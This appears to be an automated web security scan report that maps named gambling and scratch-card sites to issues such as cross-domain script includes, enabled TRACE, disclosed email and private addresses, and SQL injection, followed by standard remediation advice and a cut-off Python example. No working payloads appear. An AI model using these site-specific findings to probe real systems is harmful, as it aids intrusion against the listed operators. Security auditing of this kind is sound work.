18.25. http://www.facebook.com/plugins/likebox.php

18.26. http://www.facebook.com/plugins/likebox.php

18.27. http://www.incomate.com/

18.28. http://www.info.crazyscratch.com/AboutUs.aspx

18.29. http://www.info.crazyscratch.com/ContactUsMail.aspx

18.30. http://www.info.crazyscratch.com/FairPlay.aspx

18.31. http://www.info.crazyscratch.com/Help.aspx

18.32. http://www.info.crazyscratch.com/InviteFriend.aspx

18.33. http://www.info.crazyscratch.com/PlayersClub.aspx

18.34. http://www.info.crazyscratch.com/Privacy.aspx

18.35. http://www.info.crazyscratch.com/Promotions.aspx

18.36. http://www.info.crazyscratch.com/Responsible.aspx

18.37. http://www.info.crazyscratch.com/Terms.aspx

18.38. http://www.info.crazyscratch.com/UnderAge.aspx

18.39. https://www.interwetten.com/en/default.aspx

18.40. http://www.karamba.com/Home.aspx

18.41. http://www.lga.org.mt/lga/content.aspx

18.42. https://www.neogamespartners.com/

18.43. http://www.okscratchcards.com/

18.44. http://www.okscratchcards.com/terms-and-conditions.aspx

18.45. http://www.primescratchcards.com/index.asp

18.46. http://www.scratch2cash.com/Home.aspx

18.47. http://www.scratchcardheaven.com/Home.aspx

18.48. http://www.trustlogo.com/ttb_searcher/trustlogo

18.49. http://www.vincite.net/

19. Cross-domain script include

19.1. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

19.2. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

19.3. https://bingo.betsson.com/en/

19.4. http://blog.postcodelottery.com/

19.5. http://br.bigmoneyscratch.com/Home.aspx

19.6. http://br.winnings.com/

19.7. http://casino.bet365.com/home/en/

19.8. https://casino.betsson.com/en/

19.9. http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US

19.10. http://d.tradex.openx.com/afr.php

19.11. http://da.bigmoneyscratch.com/Home.aspx

19.12. http://da.winnings.com/

19.13. http://de.bigmoneyscratch.com/Home.aspx

19.14. http://de.winnings.com/

19.15. http://el.winnings.com/

19.16. http://es.bigmoneyscratch.com/Home.aspx

19.17. http://es.winnings.com/

19.18. http://fi.bigmoneyscratch.com/Home.aspx

19.19. http://fi.winnings.com/

19.20. http://fr.bigmoneyscratch.com/Home.aspx

19.21. http://fr.winnings.com/

19.22. http://games.bet365.com/home/en/

19.23. https://games.betsson.com/en/

19.24. http://getclicky.com/66384109

19.25. http://it.bigmoneyscratch.com/Home.aspx

19.26. http://itunes.apple.com/us/app/pclottery/id399201446

19.27. http://jquery.com/

19.28. http://leandrovieira.com/projects/jquery/lightbox/

19.29. https://livecasino.betsson.com/en/

19.30. http://mad4milk.net/

19.31. http://nl.bigmoneyscratch.com/Home.aspx

19.32. http://nl.winnings.com/

19.33. http://no.bigmoneyscratch.com/Home.aspx

19.34. http://no.winnings.com/

19.35. http://okscratchcards.com/

19.36. http://poker.bet365.com/home/en/

19.37. https://poker.betsson.com/en/

19.38. http://pt.bigmoneyscratch.com/Home.aspx

19.39. http://pt.winnings.com/

19.40. http://ronaldheft.com/code/analyticator/

19.41. https://scratch.betsson.com/en/

19.42. https://scratch.betsson.com/en/Casino

19.43. https://scratch.betsson.com/en/Casino/Bingo-Bonanza

19.44. https://scratch.betsson.com/en/Casino/Bubble-Bingo

19.45. https://scratch.betsson.com/en/Casino/Disco-Keno

19.46. https://scratch.betsson.com/en/Casino/HiLo

19.47. https://scratch.betsson.com/en/Casino/Lucky-21

19.48. https://scratch.betsson.com/en/Casino/Namaste

19.49. https://scratch.betsson.com/en/Casino/Poker-King

19.50. https://scratch.betsson.com/en/Casino/Roulette

19.51. https://scratch.betsson.com/en/Casino/Royal-Slots

19.52. https://scratch.betsson.com/en/Casino/Slot-Super-7

19.53. https://scratch.betsson.com/en/Classic

19.54. https://scratch.betsson.com/en/Classic/3-Wow

19.55. https://scratch.betsson.com/en/Classic/7th-Heaven

19.56. https://scratch.betsson.com/en/Classic/Champagne

19.57. https://scratch.betsson.com/en/Classic/Golden-Fortune

19.58. https://scratch.betsson.com/en/Classic/Happy-Birthday

19.59. https://scratch.betsson.com/en/Classic/Jungle-Joy

19.60. https://scratch.betsson.com/en/Classic/Neighbors

19.61. https://scratch.betsson.com/en/Classic/Spy-Comics

19.62. https://scratch.betsson.com/en/Classic/Super-3-Wow

19.63. https://scratch.betsson.com/en/Classic/Tiger-Mahjong

19.64. https://scratch.betsson.com/en/Classic/Wild-West

19.65. https://scratch.betsson.com/en/Classic/XO

19.66. https://scratch.betsson.com/en/Default.aspx

19.67. https://scratch.betsson.com/en/FAQ

19.68. https://scratch.betsson.com/en/Fantasy

19.69. https://scratch.betsson.com/en/Fantasy/Cash-Farm

19.70. https://scratch.betsson.com/en/Fantasy/Club-Pearl

19.71. https://scratch.betsson.com/en/Fantasy/Crazy-Cat

19.72. https://scratch.betsson.com/en/Fantasy/Dancing-Domino

19.73. https://scratch.betsson.com/en/Fantasy/Fast-Hands

19.74. https://scratch.betsson.com/en/Fantasy/Golden-Island

19.75. https://scratch.betsson.com/en/Fantasy/Knights-Battle

19.76. https://scratch.betsson.com/en/Fantasy/Love-Birds

19.77. https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds

19.78. https://scratch.betsson.com/en/Fantasy/Master-Mix

19.79. https://scratch.betsson.com/en/Fantasy/Memory-Madness

19.80. https://scratch.betsson.com/en/Fantasy/Ocean-Pearl

19.81. https://scratch.betsson.com/en/Fantasy/Outer-Space

19.82. https://scratch.betsson.com/en/Fantasy/Super-Chance

19.83. https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale

19.84. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya

19.85. https://scratch.betsson.com/en/Fantasy/Treasure-Island

19.86. https://scratch.betsson.com/en/Fantasy/Zodiac

19.87. https://scratch.betsson.com/en/GameHistory

19.88. https://scratch.betsson.com/en/Information

19.89. https://scratch.betsson.com/en/News

19.90. https://scratch.betsson.com/en/OurScratchcards

19.91. https://scratch.betsson.com/en/Ourwinners

19.92. https://scratch.betsson.com/en/Slots/5th-Avenue

19.93. https://scratch.betsson.com/en/Slots/Adventure-Jack

19.94. https://scratch.betsson.com/en/Slots/Atlantis

19.95. https://scratch.betsson.com/en/Slots/Bon-Apetit

19.96. https://scratch.betsson.com/en/Slots/Cafe-Paris

19.97. https://scratch.betsson.com/en/Slots/Castle-Slots

19.98. https://scratch.betsson.com/en/Slots/Chic-Boutique

19.99. https://scratch.betsson.com/en/Slots/Conga-Beat

19.100. https://scratch.betsson.com/en/Slots/Egyptian-Magic

19.101. https://scratch.betsson.com/en/Slots/Esmeralda

19.102. https://scratch.betsson.com/en/Slots/Fair-Play

19.103. https://scratch.betsson.com/en/Slots/Fantasia

19.104. https://scratch.betsson.com/en/Slots/Grand-Crown

19.105. https://scratch.betsson.com/en/Slots/Holiday-Hotel

19.106. https://scratch.betsson.com/en/Slots/Ice-Land

19.107. https://scratch.betsson.com/en/Slots/Legend-Of-Terra

19.108. https://scratch.betsson.com/en/Slots/Monaco-Glamour

19.109. https://scratch.betsson.com/en/Slots/Monte-Carlo

19.110. https://scratch.betsson.com/en/Slots/Pirates-Paradise

19.111. https://scratch.betsson.com/en/Slots/Sakura-Garden

19.112. https://scratch.betsson.com/en/Slots/Sea-And-Sun

19.113. https://scratch.betsson.com/en/Slots/Sky-Of-Love

19.114. https://scratch.betsson.com/en/Slots/Triple-Carnival

19.115. https://scratch.betsson.com/en/Slots/Tropical-Fruit

19.116. https://scratch.betsson.com/en/Sports/100m-Champion

19.117. https://scratch.betsson.com/en/Sports/Bowling

19.118. https://scratch.betsson.com/en/Sports/Darts

19.119. https://scratch.betsson.com/en/Sports/Goal-Kick

19.120. https://scratch.betsson.com/en/Sports/Gone-Fishing

19.121. https://scratch.betsson.com/en/Sports/Hippodrome

19.122. https://scratch.betsson.com/en/Sports/Ready-Set-Go

19.123. https://scratch.betsson.com/en/Sports/Road-Racing

19.124. https://scratch.betsson.com/en/Sports/World-Champions

19.125. http://sv.bigmoneyscratch.com/Home.aspx

19.126. http://sv.winnings.com/

19.127. http://twitter.com/PostcodeLottery

19.128. http://twitter.com/PrimeScratch

19.129. http://twitter.com/crazyscratch

19.130. http://twitter.com/ukscratch

19.131. http://www.affiliatelounge.com/

19.132. https://www.aspireaffiliates.com/

19.133. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

19.134. https://www.aspireaffiliates.com/marketing-samples/

19.135. https://www.aspireaffiliates.com/mobile/

19.136. https://www.betsson.com/start/en/

19.137. https://www.betsson.com/start/is/

19.138. https://www.betsson.com/web/en/sportsbook/

19.139. http://www.bigmoneyscratch.com/

19.140. http://www.facebook.com/

19.141. http://www.facebook.com/PrimeScratchCards

19.142. http://www.facebook.com/PrimeScratchCards

19.143. http://www.facebook.com/WinningsCom

19.144. http://www.facebook.com/crazyscratch

19.145. http://www.facebook.com/peoplespostcodelottery

19.146. http://www.facebook.com/plugins/likebox.php

19.147. http://www.gx4.com/

19.148. http://www.heavenaffiliates.com/

19.149. http://www.huddletogether.com/projects/lightbox2/

19.150. http://www.incomate.com/

19.151. http://www.metacafe.com/fplayer/

19.152. https://www.neogamespartners.com/

19.153. https://www.norskelodd.com/no/

19.154. https://www.norskelodd.com/no/FAQ

19.155. https://www.norskelodd.com/no/aboutus/

19.156. https://www.norskelodd.com/no/charity/

19.157. https://www.norskelodd.com/no/default.aspx

19.158. https://www.norskelodd.com/no/fair-play/

19.159. https://www.norskelodd.com/no/forgotten-password

19.160. https://www.norskelodd.com/no/play/3Wow

19.161. https://www.norskelodd.com/no/play/7thHeaven

19.162. https://www.norskelodd.com/no/play/GonzosQuest

19.163. https://www.norskelodd.com/no/promotions/

19.164. http://www.ok.co.uk/home/

19.165. http://www.okscratchcards.com/

19.166. http://www.opensource.org/licenses/mit-license.php

19.167. http://www.primegrattage.com/

19.168. http://www.vincite.net/

19.169. http://www.winnings.com/

19.170. http://www.winnings.com/how-to-win-money

19.171. http://www.winnings.com/instant-games

19.172. http://www.winnings.com/lottery-scratch-cards

19.173. http://www.winnings.com/scratch-cards

19.174. http://www.winnings.com/site-map

19.175. http://www.winnings.com/slots

19.176. http://www.youtube.com/user/CrazyScratchCom

19.177. http://www.youtube.com/user/PostcodeLottery

19.178. http://www.youtube.com/user/primescratchcards1

20. TRACE method is enabled

20.1. http://d.tradex.openx.com/

20.2. http://d.xp1.ru4.com/

20.3. http://gmpg.org/

20.4. http://jquery.com/

20.5. http://jquery.org/

20.6. http://m.xp1.ru4.com/

20.7. http://optimized-by.rubiconproject.com/

20.8. https://sealinfo.verisign.com/

20.9. http://secure-us.imrworldwide.com/

20.10. http://sizzlejs.com/

20.11. http://winter.metacafe.com/

20.12. http://www.egba.eu/

20.13. http://www.gambleaware.co.uk/

20.14. http://www.gamcare.org.uk/

20.15. http://www.gx4.com/

20.16. http://www.nedstat.com/

20.17. http://www.opensource.org/

20.18. http://www.postcodelottery.com/

20.19. https://www.postcodelottery.com/

20.20. http://www.quirksmode.org/

20.21. http://www.tstglobal.com/

21. Email addresses disclosed

21.1. https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js

21.2. https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js

21.3. https://members.bet365.com/members/chat/

21.4. http://neogames-tech.com/careers

21.5. http://neogames-tech.com/contact-us

21.6. http://neogames-tech.com/corporate

21.7. http://primescratchcards.com/images/HelpDepositMethods.asp

21.8. http://primescratchcards.com/images/InviteFriend.asp

21.9. http://primescratchcards.com/images/Responsible.asp

21.10. http://primescratchcards.com/images/SecurityAndPrivacy.asp

21.11. http://primescratchcards.com/images/aboutus.asp

21.12. http://primescratchcards.com/images/affiliates.asp

21.13. http://primescratchcards.com/images/bg.jpg

21.14. http://primescratchcards.com/images/contactus.asp

21.15. http://primescratchcards.com/images/fairplay.asp

21.16. http://primescratchcards.com/images/help.asp

21.17. http://primescratchcards.com/images/index.asp

21.18. http://primescratchcards.com/images/media.asp

21.19. http://primescratchcards.com/images/playersclub.asp

21.20. http://primescratchcards.com/images/promotions.asp

21.21. http://primescratchcards.com/images/terms.asp

21.22. http://primescratchcards.com/images/underage.asp

21.23. http://scratch.co.uk/about/

21.24. http://scratch.co.uk/contact/

21.25. http://scratch.co.uk/help/

21.26. http://scratch.co.uk/help/privacy/

21.27. http://scratch.co.uk/problem-gambling/

21.28. http://scratch.co.uk/vis-club/

21.29. http://trk.primescratchcards.com/w3c/p3p.xml

21.30. http://widgets.twimg.com/j/2/widget.css

21.31. http://widgets.twimg.com/j/2/widget.js

21.32. http://www.bet365.com/home/js/FlashDetection_vA009cr.js

21.33. http://www.bet365.com/home/js/Navigation_vA081cr.js

21.34. https://www.betsson.com/en/customer-service/

21.35. https://www.betsson.com/en/customer-service/responsible-gaming/

21.36. https://www.betsson.com/en/customer-service/terms/index.asp

21.37. http://www.bigmoneyscratch.com/Affiliates.aspx

21.38. http://www.gamblersanonymous.org/

21.39. http://www.gx4.com/

21.40. http://www.huddletogether.com/projects/lightbox2/

21.41. http://www.lga.org.mt/lga/content.aspx

21.42. http://www.lga.org.mt/lga/home.aspx

21.43. http://www.neogames.com/careers

21.44. http://www.neogames.com/contact-us

21.45. http://www.neogames.com/corporate

21.46. http://www.neogames.com/news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group

21.47. https://www.norskelodd.com/no/FAQ

21.48. https://www.norskelodd.com/no/charity/

21.49. http://www.opensource.org/licenses/mit-license.php

21.50. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm

21.51. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm

21.52. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

21.53. http://www.primegrattage.com/

21.54. http://www.primescratchcards.com/

21.55. http://www.primescratchcards.com/HelpDepositMethods.asp

21.56. http://www.primescratchcards.com/InviteFriend.asp

21.57. http://www.primescratchcards.com/Responsible.asp

21.58. http://www.primescratchcards.com/SecurityAndPrivacy.asp

21.59. http://www.primescratchcards.com/aboutus.asp

21.60. http://www.primescratchcards.com/affiliates.asp

21.61. http://www.primescratchcards.com/contactus.asp

21.62. http://www.primescratchcards.com/fairplay.asp

21.63. http://www.primescratchcards.com/help.asp

21.64. http://www.primescratchcards.com/index.asp

21.65. http://www.primescratchcards.com/media.asp

21.66. http://www.primescratchcards.com/playersclub.asp

21.67. http://www.primescratchcards.com/promotions.asp

21.68. http://www.primescratchcards.com/terms.asp

21.69. http://www.primescratchcards.com/underage.asp

21.70. http://www.primescratchcards.com.br/

21.71. http://www.svenskalotter.com/Affiliates.aspx

21.72. http://www.svenskalotter.com/Charity.aspx

21.73. http://www.verisign.co.uk/

22. Private IP addresses disclosed

22.1. http://connect.facebook.net/en_US/all.js

22.2. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.3. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.4. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.5. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.6. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.7. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.8. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.9. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/R9NKeEUZ860.css

22.10. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/29zADtiP5cm.css

22.11. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/6Lsyu5J6BKV.css

22.12. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/13eVoEevxOb.css

22.13. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/KI-TuOEwsYB.js

22.14. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Gny22VYkiF8.css

22.15. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/qCyv4dtIhXX.css

22.16. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/cw0X-OuHro4.css

22.17. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/pnnjl6ACZdc.css

22.18. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/zu6qmwS44NI.css

22.19. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/JpK09bsayNa.js

22.20. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vGrfOJHPJkR.css

22.21. http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/dDcIjg2q0Sp.css

22.22. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ApyVrGzMbqQ.js

22.23. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/L-db0ALpEr8.js

22.24. http://static.ak.fbcdn.net/rsrc.php/v1/z5/r/55ZG1uMFCrx.png

22.25. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

22.26. http://static.ak.fbcdn.net/rsrc.php/v1/zC/r/5b5JL166gaA.png

22.27. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png

22.28. http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/3CROxDf49ph.png

22.29. http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png

22.30. http://www.facebook.com/

22.31. http://www.facebook.com/

22.32. http://www.facebook.com/PrimeScratchCards

22.33. http://www.facebook.com/PrimeScratchCards

22.34. http://www.facebook.com/WinningsCom

22.35. http://www.facebook.com/WinningsCom

22.36. http://www.facebook.com/crazyscratch

22.37. http://www.facebook.com/extern/login_status.php

22.38. http://www.facebook.com/extern/login_status.php

22.39. http://www.facebook.com/pages/BigMoneyScratch/156518521055171

22.40. http://www.facebook.com/pages/PrimeScratchCards/122783514413813

22.41. http://www.facebook.com/peoplespostcodelottery

22.42. http://www.facebook.com/plugins/likebox.php

22.43. http://www.facebook.com/plugins/likebox.php

22.44. https://www.interwetten.com/cs/Default.aspx

22.45. https://www.interwetten.com/de/Default.aspx

22.46. https://www.interwetten.com/el/Default.aspx

22.47. https://www.interwetten.com/en/Default.aspx

22.48. https://www.interwetten.com/en/casino/default.aspx

22.49. https://www.interwetten.com/en/games/default.aspx

22.50. https://www.interwetten.com/en/online-skillgames

22.51. https://www.interwetten.com/en/scratch/default.aspx

22.52. https://www.interwetten.com/en/skill/default.aspx

22.53. https://www.interwetten.com/es/Default.aspx

22.54. https://www.interwetten.com/fr/Default.aspx

22.55. https://www.interwetten.com/it/Default.aspx

22.56. https://www.interwetten.com/pt/Default.aspx

22.57. https://www.interwetten.com/tr/Default.aspx

22.58. http://www.metacafe.com/fplayer/

23. Robots.txt file

23.1. http://ad-emea.doubleclick.net/ad/N5493.Ok/B4240999.6

23.2. http://ad.doubleclick.net/N6707/adj/meta.homepage/adminMsg

23.3. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

23.4. http://b.scorecardresearch.com/b

23.5. https://bingo.betsson.com/en/

23.6. http://blog.crazyscratch.com/

23.7. http://blog.deconcept.com/swfobject/

23.8. http://blog.postcodelottery.com/

23.9. http://blog.primescratchcards.co.uk/

23.10. http://br.winnings.com/

23.11. http://c.betrad.com/a/n/581/1296.js

23.12. http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US

23.13. http://d.tradex.openx.com/afr.php

23.14. http://d.xp1.ru4.com/um

23.15. http://da.crazyscratch.com/

23.16. http://da.winnings.com/

23.17. http://de.crazyscratch.com/

23.18. http://de.winnings.com/

23.19. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

23.20. https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

23.21. http://download.neogames-tech.com/Brands/MundiRasca/Website/General/BottomMenuBG.jpg

23.22. https://download.neogames-tech.com/chat/chatstart.aspx

23.23. http://el.crazyscratch.com/

23.24. http://el.winnings.com/

23.25. http://en.crazyscratch.com/

23.26. http://es.crazyscratch.com/

23.27. http://es.winnings.com/

23.28. http://feeds.bbci.co.uk/news/rss.xml

23.29. http://fi.crazyscratch.com/

23.30. http://fi.winnings.com/

23.31. http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

23.32. http://fr.crazyscratch.com/

23.33. http://fr.winnings.com/

23.34. http://getclicky.com/66384109

23.35. http://gmpg.org/xfn/11

23.36. http://go.microsoft.com/fwlink/

23.37. http://it.crazyscratch.com/

23.38. http://itunes.apple.com/us/app/pclottery/id399201446

23.39. http://jquery.org/license

23.40. http://leandrovieira.com/projects/jquery/lightbox/

23.41. http://m.xp1.ru4.com/ad

23.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

23.43. http://nl.crazyscratch.com/

23.44. http://nl.winnings.com/

23.45. http://no.crazyscratch.com/

23.46. http://no.winnings.com/

23.47. http://pagead2.googlesyndication.com/pagead/imgad

23.48. http://pixel.invitemedia.com/data_sync

23.49. http://pixel.quantserve.com/pixel

23.50. http://pt.crazyscratch.com/

23.51. http://pt.winnings.com/

23.52. http://pubads.g.doubleclick.net/pagead/adview

23.53. http://s.mcstatic.com/Images/Studios/videogame/ChannelLogo.jpg

23.54. http://s0.2mdn.net/879366/flashwrite_1_2.js

23.55. http://s1.mcstatic.com/JS12/Home/

23.56. http://s3.mcstatic.com/thumb/6373642/18140891/4/videos/2/1/the_cleveland_show_karate_season_2.jpg

23.57. http://s4.mcstatic.com/CSS/Global/

23.58. http://s6.mcstatic.com/thumb/6289097/17948388/4/videos/0/1/l_a_noire_gameplay_series_3.jpg

23.59. http://safebrowsing.clients.google.com/safebrowsing/downloads

23.60. http://scratch.co.uk/

23.61. http://spe.atdmt.com/ds/AAAVEWEWAWWA/20110413_WWA_Sp11_X1_NewCreative/WWA_Sp11_X1_Online_Fingertips_300x250.gif

23.62. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.63. http://sv.crazyscratch.com/

23.64. http://sv.winnings.com/

23.65. http://twitter.com/ukscratch

23.66. http://va.px.invitemedia.com/goog_imp

23.67. http://video.google.com/googleplayer.swf

23.68. http://winnings.com/wp-content/plugins/google-analyticator/external-tracking.min.js

23.69. http://winter.metacafe.com/Openx/www/delivery/lg.php

23.70. http://www.adobe.com/go/getflashplayer

23.71. http://www.apple.com/qtactivex/qtplugin.cab

23.72. https://www.aspireaffiliates.com/

23.73. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

23.74. http://www.clickandbuy.com/WW_en/payment/index.html

23.75. http://www.crazyscratch.com/

23.76. http://www.facebook.com/WinningsCom

23.77. http://www.gambleaware.co.uk/

23.78. http://www.gamblersanonymous.org.uk/

23.79. http://www.gamcare.org.uk/

23.80. http://www.google-analytics.com/__utm.gif

23.81. http://www.heavenaffiliates.com/

23.82. https://www.interwetten.com/

23.83. http://www.itechlabs.com.au/

23.84. http://www.lga.org.mt/lga/content.aspx

23.85. http://www.metacafe.com/fplayer/

23.86. http://www.national-lottery.co.uk/

23.87. http://www.nedstat.com/terms.html

23.88. https://www.neogamespartners.com/

23.89. http://www.opensource.org/licenses/mit-license.php

23.90. http://www.paysafecard.com/

23.91. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

23.92. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

23.93. http://www.thawte.com/

23.94. https://www.thawte.com/

23.95. http://www.trustlogo.com/ttb_searcher/trustlogo

23.96. http://www.tstglobal.com/

23.97. http://www.ukash.com/

23.98. http://www.verisign.co.uk/

23.99. http://www.vincite.net/

23.100. http://www.winnings.com/

23.101. http://www.youtube.com/v/

24. Cacheable HTTPS response

24.1. https://in.getclicky.com/

24.2. https://sealinfo.verisign.com/splash

24.3. https://www.aspireaffiliates.com/

24.4. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

24.5. https://www.aspireaffiliates.com/marketing-samples/

24.6. https://www.aspireaffiliates.com/mobile/

24.7. https://www.betsson.com/en/customer-service/

24.8. https://www.betsson.com/en/customer-service/forgotten-password/

24.9. https://www.betsson.com/en/customer-service/privacy-statement/

24.10. https://www.betsson.com/en/customer-service/responsible-gaming/

24.11. https://www.betsson.com/en/customer-service/terms/index.asp

24.12. https://www.betsson.com/my-account/refer-a-friend/index.asp

24.13. https://www.interwetten.com/en/Default.aspx

24.14. https://www.interwetten.com/en/american-football-betting

24.15. https://www.interwetten.com/en/australian-rules-football-betting

24.16. https://www.interwetten.com/en/beach-soccer-betting

24.17. https://www.interwetten.com/en/boxing-betting

24.18. https://www.interwetten.com/en/casino/default.aspx

24.19. https://www.interwetten.com/en/cycling-betting

24.20. https://www.interwetten.com/en/darts-betting

24.21. https://www.interwetten.com/en/football-betting

24.22. https://www.interwetten.com/en/games/default.aspx

24.23. https://www.interwetten.com/en/golf-betting

24.24. https://www.interwetten.com/en/handball-betting

24.25. https://www.interwetten.com/en/ice-hockey-betting

24.26. https://www.interwetten.com/en/livebets

24.27. https://www.interwetten.com/en/motorbikes-betting

24.28. https://www.interwetten.com/en/online-skillgames

24.29. https://www.interwetten.com/en/politics-betting

24.30. https://www.interwetten.com/en/rugby-betting

24.31. https://www.interwetten.com/en/sailing-betting

24.32. https://www.interwetten.com/en/scratch/default.aspx

24.33. https://www.interwetten.com/en/ski-alpine-betting

24.34. https://www.interwetten.com/en/skill/default.aspx

24.35. https://www.interwetten.com/en/sportsbook/default.aspx

24.36. https://www.interwetten.com/en/tennis-betting

24.37. https://www.interwetten.com/en/volleyball-betting

24.38. https://www.interwetten.com/en/water-polo-betting

24.39. https://www.interwetten.com/en/winter-games-betting

24.40. https://www.norskelodd.com/no/

24.41. https://www.norskelodd.com/no/FAQ

24.42. https://www.norskelodd.com/no/aboutus/

24.43. https://www.norskelodd.com/no/charity/

24.44. https://www.norskelodd.com/no/default.aspx

24.45. https://www.norskelodd.com/no/fair-play/

24.46. https://www.norskelodd.com/no/forgotten-password

24.47. https://www.norskelodd.com/no/play/3Wow

24.48. https://www.norskelodd.com/no/play/7thHeaven

24.49. https://www.norskelodd.com/no/play/GonzosQuest

24.50. https://www.norskelodd.com/no/promotions/

24.51. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

24.52. https://www.thawte.com/

25. HTML does not specify charset

25.1. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

25.2. http://d.xp1.ru4.com/um

25.3. http://download.neogames-tech.com/

25.4. http://f.nexac.com/favicon.ico

25.5. http://in.getclicky.com/

25.6. https://in.getclicky.com/

25.7. http://members.bet365.com/site.asp

25.8. http://neogames-tech.com/outbound/article/www.lga.org.mt

25.9. http://pixel.invitemedia.com/data_sync

25.10. http://trk.primescratchcards.com/

25.11. http://www.gamblersanonymous.org/

25.12. http://www.maestrocard.com/

25.13. http://www.mastercard.com/uk/gateway.html

25.14. http://www.neogames.com/outbound/article/crazyscratch.com

25.15. http://www.neogames.com/outbound/article/karamba.com

25.16. http://www.neogames.com/outbound/article/mundirasca.com

25.17. http://www.neogames.com/outbound/article/norgesloddet.com

25.18. http://www.neogames.com/outbound/article/scratch.betsson.com

25.19. http://www.neogames.com/outbound/article/www.crazyscratch.com

25.20. http://www.neogames.com/outbound/article/www.interwetten.com

25.21. http://www.neogames.com/outbound/article/www.postcodelottery.co.uk

25.22. http://www.neogames.com/outbound/article/www.winnings.com

25.23. http://www.primescratchcards.com/track/

25.24. http://www.verisign.co.uk/

25.25. http://www.winnings.com/wp-admin/admin-ajax.php

26. Content type incorrectly stated

26.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

26.2. http://in.getclicky.com/

26.3. https://in.getclicky.com/

26.4. http://neogames-tech.com/outbound/article/www.lga.org.mt

26.5. http://rtb50.doubleverify.com/rtb.ashx/verifyc

26.6. https://secure.neogames-tech.com/ScratchCards/images/seal_background.png

26.7. http://server.iad.liveperson.net/hcp/html/mTag.js

26.8. http://trk.primescratchcards.com/w3c/p3p.xml

26.9. http://www.neogames.com/outbound/article/crazyscratch.com

26.10. http://www.neogames.com/outbound/article/karamba.com

26.11. http://www.neogames.com/outbound/article/mundirasca.com

26.12. http://www.neogames.com/outbound/article/norgesloddet.com

26.13. http://www.neogames.com/outbound/article/scratch.betsson.com

26.14. http://www.neogames.com/outbound/article/www.crazyscratch.com

26.15. http://www.neogames.com/outbound/article/www.interwetten.com

26.16. http://www.neogames.com/outbound/article/www.postcodelottery.co.uk

26.17. http://www.neogames.com/outbound/article/www.winnings.com

26.18. http://www.winnings.com/wp-admin/admin-ajax.php

27. Content type is not specified



1. SQL injection
There are 13 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
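The two halves of that paragraph, the unsafe string concatenation and the parameterised form, side by side as an added example; this is not code from the report or from the site under test. It uses Python's sqlite3 module, an illustrative games table and the report's own payload pairs, URL-decoded. The table, its column names and the query functions are assumptions made for the example only.

```python
import sqlite3

# Constructed stand-in for the application's game table. The report gives no
# schema, so this one is an assumption made for the example only.
def make_db():
    conn = sqlite3.connect(":memory:")
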